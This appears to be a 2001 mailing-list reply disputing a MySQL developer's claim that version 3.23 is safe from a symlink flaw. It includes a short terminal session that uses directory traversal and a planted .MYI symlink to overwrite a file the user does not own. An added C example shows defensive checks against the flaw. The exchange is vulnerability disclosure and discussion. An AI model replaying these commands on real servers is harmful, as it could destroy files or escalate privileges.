Hi.

On Tue, Mar 20, 2001 at 12:22:19PM +0100, [EMAIL PROTECTED] wrote:
> Hi!
> 
> On Mar 20, Basil Hussain wrote:
> > Hi all,
> > 
> > The original message below was posted to the BugTraq mailing list. Have the
> > developers seen this? I know it talks about version mysql-3.20.32a (which is
> > ancient), but he mentions that it affects other versions.
> > 
> > Anyway, I don't run my MySQL server as root, so I'm not worried. :)
> > 
> 
> You shouldn't.
> 
> MySQL-3.23 is not vulnerable.

How did you determine that?


Sorry to contradict, but have a look:

newton:~> mysql -u root -e "select version()"
+-----------+
| version() |
+-----------+
| 3.23.33   |
+-----------+
8:26:25 newton:~> sudo -u mysql touch /tmp/test # just created a file owned by mysql-user
8:26:45 newton:~> ln -sf /tmp/test /tmp/yikes.MYI
8:26:54 newton:~> ls -l /tmp
[...]
-rw-r--r--    1 mysql    mysql           0 Mar 21 08:26 test
lrwxrwxrwx    1 philemon philemon        9 Mar 21 08:28 yikes.MYI -> /tmp/test
8:26:57 newton:~> mysql ../../../../tmp -e "create table yikes(w int(4))"
8:27:02 newton:~> ls -l /tmp
[...]
-rw-r--r--    1 mysql    mysql        1024 Mar 21 08:28 test
-rw-rw----    1 mysql    mysql           0 Mar 21 08:28 yikes.MYD
lrwxrwxrwx    1 philemon philemon        9 Mar 21 08:28 yikes.MYI -> /tmp/test
-rw-rw----    1 mysql    mysql        8548 Mar 21 08:28 yikes.frm

So, I have just overwritten a file not owned by me, namely /tmp/test.
If mysql was running as root (which is of course deprecated), I could
overwrite any file in the system this way and even gain root access
(as shown by someone on bugtraq), I think.

Did I overlook something?

So, it looks to me, that at least 3.23.33 is not secure in this way (I
have not compared 3.23.34 resp. 3.23.35 because for both problems were
reported preventing them from use in production systems).

Even without MySQL running as root, I can do a lot of harm (with
privilege to create tables, I can probably gain MySQL root privileges,
delete any other table, delete configs and log files and so on).

Bye,

        Benjamin.
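
As an added illustration (not part of the original message and not MySQL's own code), here are two checks that would stop the session shown above: reject a database name that is not a single path component, and create table files with O_CREAT|O_EXCL so an existing symlink is never written through. The helper names db_name_is_safe, create_table_file and demo_symlink_is_refused are hypothetical, and the scratch directory with its planted link is constructed for the demo.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* openat, O_NOFOLLOW, mkdtemp */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical policy: a database name must be one plain path component
 * (no separators, no leading dot), so "../../../../tmp" is rejected. */
int db_name_is_safe(const char *name) {
    if (name == NULL || name[0] == '\0' || name[0] == '.')
        return 0;
    return strchr(name, '/') == NULL && strchr(name, '\\') == NULL;
}

/* Hypothetical helper: create a new table file relative to an open database
 * directory. O_CREAT|O_EXCL fails with EEXIST if the name already exists,
 * even as a symlink, so a planted yikes.MYI link is never written through. */
int create_table_file(int dirfd, const char *file) {
    if (strchr(file, '/') != NULL) { errno = EINVAL; return -1; }
    return openat(dirfd, file, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0660);
}

/* Constructed scenario mirroring the session: a symlink yikes.MYI -> test
 * in a scratch directory. Returns 1 if the create is refused and the link
 * target stays empty, 0 otherwise. */
int demo_symlink_is_refused(void) {
    char dir[] = "/tmp/dbdemoXXXXXX";
    struct stat st;
    if (mkdtemp(dir) == NULL) return 0;
    int dfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dfd < 0) return 0;
    int t = openat(dfd, "test", O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (t >= 0) close(t);
    int ok = t >= 0 && symlinkat("test", dfd, "yikes.MYI") == 0;
    int fd = create_table_file(dfd, "yikes.MYI");
    ok = ok && fd == -1 && errno == EEXIST;
    ok = ok && fstatat(dfd, "test", &st, 0) == 0 && st.st_size == 0;
    unlinkat(dfd, "yikes.MYI", 0); unlinkat(dfd, "test", 0);
    close(dfd); rmdir(dir);
    return ok;
}

int main(void) { return demo_symlink_is_refused() ? 0 : 1; }
```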

